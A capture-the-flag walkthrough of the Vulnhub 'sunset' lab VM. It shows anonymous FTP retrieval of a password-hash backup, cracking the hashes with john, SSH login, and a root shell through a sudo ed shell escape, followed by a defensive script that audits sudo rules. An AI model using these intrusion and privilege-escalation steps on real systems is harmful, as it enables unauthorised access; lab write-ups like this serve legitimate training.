Vulnhub: sunset
This box is the first box in the sunset series. It is a very simple box that only requires two steps to get root.
Scanning:
Finding the machine on the network
Nmap scan report for 192.168.56.130
Host is up (0.00021s latency).
Not shown: 998 closed ports
PORT STATE SERVICE
21/tcp open ftp
22/tcp open ssh
More Scanning:
Getting more details
crazyeights@es-base:~$ nmap -A -p- 192.168.56.130
Starting Nmap 7.80 ( https://nmap.org ) at 2020-12-29 17:25 EST
Nmap scan report for 192.168.56.130
Host is up (0.00010s latency).
Not shown: 65533 closed ports
PORT STATE SERVICE VERSION
21/tcp open ftp pyftpdlib 1.5.5
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
|_-rw-r--r-- 1 root root 1062 Jul 29 2019 backup
| ftp-syst:
| STAT:
| FTP server status:
| Connected to: 192.168.56.130:21
| Waiting for username.
| TYPE: ASCII; STRUcture: File; MODE: Stream
| Data connection closed.
|_End of status.
22/tcp open ssh OpenSSH 7.9p1 Debian 10 (protocol 2.0)
[SNIP]
FTP:
Log in to ftp as Anonymous
crazyeights@es-base:~$ ftp 192.168.56.130
Connected to 192.168.56.130.
220 pyftpdlib 1.5.5 ready.
Name (192.168.56.130:crazyeights): anonymous
331 Username ok, send password.
Password:
230 Login successful.
Remote system type is UNIX.
Using binary mode to transfer files.
Download the only file:
ftp> ls
200 Active data connection established.
125 Data connection already open. Transfer starting.
-rw-r--r-- 1 root root 1062 Jul 29 2019 backup
226 Transfer complete.
ftp> get backup
local: backup remote: backup
200 Active data connection established.
125 Data connection already open. Transfer starting.
226 Transfer complete.
1062 bytes received in 0.03 secs (39.7634 kB/s)
Check out the file backup we found:
crazyeights@es-base:~$ file backup
backup: ASCII text
crazyeights@es-base:~$ cat backup
CREDENTIALS:
office:$6$$9ZYTy.VI0M7cG9tVcPl.QZZi2XHOUZ9hLsiCr/avWTajSPHqws7.75I9ZjP4HwLN3Gvio5To4gjBdeDGzhq.X.
datacenter:$6$$3QW/J4OlV3naFDbhuksxRXLrkR6iKo4gh.Zx1RfZC2OINKMiJ/6Ffyl33OFtBvCI7S4N1b8vlDylF2hG2N0NN/
sky:$6$$Ny8IwgIPYq5pHGZqyIXmoVRRmWydH7u2JbaTo.H2kNG7hFtR.pZb94.HjeTK1MLyBxw8PUeyzJszcwfH0qepG0
sunset:$6$406THujdibTNu./R$NzquK0QRsbAUUSrHcpR2QrrlU3fA/SJo7sPDPbP3xcCR/lpbgMXS67Y27KtgLZAcJq9KZpEKEqBHFLzFSZ9bo/
space:$6$$4NccGQWPfiyfGKHgyhJBgiadOlP/FM4.Qwl1yIWP28ABx.YuOsiRaiKKU.4A1HKs9XLXtq8qFuC3W6SCE4Ltx/
The backup file appears to contain credentials of local users on the machine. We can use john to crack them.
Use john to crack the credentials:
The format of the hashes is sha512crypt
crazyeights@es-base:~$ john --format=sha512crypt sunset_hash
Using default input encoding: UTF-8
Loaded 4 password hashes with 2 different salts (sha512crypt, crypt(3) $6$ [SHA512 256/256 AVX2 4x])
Cost 1 (iteration count) is 5000 for all loaded hashes
Will run 16 OpenMP threads
Proceeding with single, rules:Single
Press 'q' or Ctrl-C to abort, almost any other key for status
sky (sky)
Warning: Only 39 candidates buffered for the current salt, minimum 64 needed for performance.
Warning: Only 56 candidates buffered for the current salt, minimum 64 needed for performance.
Almost done: Processing the remaining buffered candidate passwords, if any.
Warning: Only 47 candidates buffered for the current salt, minimum 64 needed for performance.
Warning: Only 49 candidates buffered for the current salt, minimum 64 needed for performance.
Proceeding with wordlist:/usr/share/john/password.lst, rules:Wordlist
Proceeding with incremental:ASCII
cheer14 (sunset)
The credentials sky:sky do not work on anything.
Trying the credentials sunset:cheer14 on ssh
crazyeights@es-base:~$ ssh sunset@192.168.56.130
Getting user.txt:
sunset@sunset:~$ ls
user.txt
sunset@sunset:~$ cat user.txt
5b5b8e9b01ef27a1cc0a2d5fa87d7190
Privilege Escalation:
Finding what the user can run with elevated privileges:
sunset@sunset:~$ sudo -l
Matching Defaults entries for sunset on sunset:
env_reset, mail_badpass,
secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin
User sunset may run the following commands on sunset:
(root) NOPASSWD: /usr/bin/ed
Looking up ed:
NAME
ed - line-oriented text editor
Looking up ed on GTFOBins:
It can be used to break out from restricted environments by spawning an interactive system shell.
ed
!/bin/sh
Getting root:
sunset@sunset:~$ sudo ed
!/bin/bash
root@sunset:/home/sunset# cd /root
Getting root flag:
root@sunset:~# ls
flag.txt ftp server.sh
root@sunset:~# cat flag.txt
25d7ce0ee3cbf71efbac61f85d0c14fe
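A defender-side check for the sudo rule this box relies on, as an added example that is not part of the original writeup: it parses sudo -l output and flags root rules for programs that can run other commands, such as the ed rule above. The SHELL_CAPABLE list and the audit_sudo_l name are assumptions made for the illustration, and the list is not exhaustive.

```python
import os
import re

# Constructed sample: the `sudo -l` output from the walkthrough above.
SAMPLE = r"""Matching Defaults entries for sunset on sunset:
    env_reset, mail_badpass,
    secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin
User sunset may run the following commands on sunset:
    (root) NOPASSWD: /usr/bin/ed
"""

# Assumption: a short, non-exhaustive set of programs that can run other
# commands from inside themselves (editors, pagers, interpreters).
SHELL_CAPABLE = {"ed", "vi", "vim", "less", "more", "man", "awk", "find", "gdb"}

# "(runas) TAG: TAG: cmd, cmd" as printed by `sudo -l`.
RULE = re.compile(r"^\s*\(([^)]*)\)\s*((?:[A-Z_]+:\s*)*)(.+)$")

def audit_sudo_l(text):
    """Return one finding per risky command rule in `sudo -l` output."""
    findings, in_rules = [], False
    for line in text.splitlines():
        if "may run the following commands" in line:
            in_rules = True
            continue
        m = RULE.match(line) if in_rules else None
        if not m:
            continue
        runas = m.group(1).split(":")[0].strip()
        tags = set(re.findall(r"[A-Z_]+", m.group(2)))
        if runas not in ("root", "ALL"):
            continue  # only rules that grant root are in scope here
        for cmd in filter(None, (c.strip() for c in m.group(3).split(","))):
            name = os.path.basename(cmd.split()[0])
            if cmd == "ALL":
                risk = "unrestricted root"
            # NOEXEC is the sudoers tag that stops a dynamically linked
            # program from executing further programs, so it is not flagged.
            elif name in SHELL_CAPABLE and "NOEXEC" not in tags:
                risk = "shell escape to root"
            else:
                continue
            findings.append({"command": cmd, "runas": runas,
                             "nopasswd": "NOPASSWD" in tags, "risk": risk})
    return findings

if __name__ == "__main__":
    for finding in audit_sudo_l(SAMPLE):
        print(finding)
```

If the user only needs to edit specific files, a sudoedit rule for those paths avoids granting an interactive editor as root at all.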
FIN.